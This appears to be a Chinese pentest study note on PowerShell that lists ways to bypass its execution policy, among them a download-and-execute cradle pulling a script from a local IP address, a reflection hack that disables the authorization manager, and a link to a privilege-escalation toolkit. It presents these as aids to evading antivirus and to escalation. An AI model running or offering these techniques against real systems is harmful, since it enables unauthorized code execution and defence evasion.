Windows PowerShell 是一种命令行外壳程序的脚本环境,它内置在每个受支持的Windows版中(Windows7、Windows Server2008 R2及更高版本),为windows命令行使用者和脚本编写者利用.NET Framework的强大功能提供了遍历。
需要.NET环境支持
win7以上默认安装
脚本可以在内存中运行,不需要写入磁盘
几乎不会出发杀软
可以远程执行
是windows脚本执行更容易
cmd.exe的运行通常会被阻止,但是PowerShell不会被阻止
可用于管理活动目录
一个PowerShell脚本其实就是一个简单的文本文件,其扩展名为".ps1"。PowerShell脚本文件中包含一系列命令,每个命令为独立一行。
为防止恶意脚本,默认情况下策略为“不能执行”
若无法运行,可使用cmdlet
查询当前执行策略
get-executionPolicy
Restricted
:脚本不能运行(默认设置)
RemoteSigned
:在本地创建脚本可以运行,但从网上下载的不能(拥有数字证书签名除外)
AllSigned
:仅当脚本受信任的发布者签名时才能运行
Urestricted
:允许所有脚本运行
可以使用cmdlet命令设置PowerShell的执行策略
set-ExcutionPolicy
必须输入完整路径和问价名,如:
C:\Scripts\a.ps1
作用:将一个命令的输出作为另一个命令的输入,两个命令用 |
连接
get-process p* | stop-process
一个神奇的命令
help
get-host
$PSVersionTable.PSVERSION
powershell
也可以从cmd输入命令切入
命令很多
get-process
set-alias aaa get-command
cls
clear
要想运行PowerShell脚本程序,必须使用管理员权限将策略从Restricted改为Unrestricted。
PowerUp.ps1
文件可从这里下载
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
runme.ps1
Write-Host "My voice is my passport, verify me."
Get-ExecutionPolicy
同样可以将之心执行策略设置为不同级别。
linux 基本命令也可以用
Set-ExecutionPolicy
Get-ExecutionPolicy -List | Format-Table -Autoize
如果策略很开放,想使用更严格的方式来测试如下方案,需切换到管理员身份,执行
Set-ExecutionPolicy Restricted
引号内如果是中文会报错,未知
Get-Content ./runme.ps1 | PowerShell.exe -noprofile -
Type ./runme.ps1 | PowerShell.exe -noprofile -
PowerShell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://10.12.120.66:8888/runme.ps1')"
这里一直没测试成功
此方法和直接粘贴脚本内容的方式很像,但是此方法不需要一个交互式窗口。它适用于简单脚本执行,对于复杂脚本会发生解析错误。该方法同样不会写内容到磁盘中。
PowerShell -command "Write-Host 'you are good.'"
可以将该命令写到一个bat文件中,然后放到启动目录中,来帮助提权
此方法很上一个方法很相似,但是此方式脚本内容是 Unicode/base64 encod字符串。
使用编码的好处是可以让你避免执行使用Command参数时产生一些糟糕的解析问题
该方法最好的在对对抗PowerShell remoting开启的Remote系统
invoke-command -scriptblock {Write-Host "You are good."}
如下命令可以来从一个远程系统上抓区执行策略,同时运用到本地计算机中
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force
Get-Content ./runme.ps1 | Invoke-Expression
gc ./runme.ps1 | iex
测试均未生效
这个方法时微软提供的用来绕过执行策略的一种方式。当指定白标志后,即视为什么都不做,什么警告都不提示
PowerShell -ExecutionPolicy bypass -File ./runme.ps1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IOnKv7Jv-1630949007798)(Windows PowerShell使用Bypass执行策略标志.png)]
该标志和bypass很像,但是当使用该标志时,意味着加载所有的配置文件和执行所有的脚本
PowerShell -ExecutionPolicy unrestricted -File ./runme.ps1
创建脚本,然后按签名指南,最后运行
签名指南:https://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
PowerShell.exe -ExecutionPolicy Remote-signed -File ./runme.ps1
未测试成功
如果函数可以在交互式窗口中使用,也可以在Command参数中指定。
一旦该函数被执行,则会认证管理器,同时默认策略改为unrestricted。
该方法只在一个会话范围内有效。
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} Disable-ExecutionPolicy ./runme.ps1
disable-ExecutionPolicy
./runme.ps1
执行策略可以应用到各个级别,其中包括完全控制process。使用该方法仅限于session中,执行策略会变为unrestricted
Set-ExecutionPolicy Bypass -Scope Process
Set-ExecutionPolicy -Scopr CurrentUser ExecutionPolucy UnRestricted
命令报错
HKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
regedit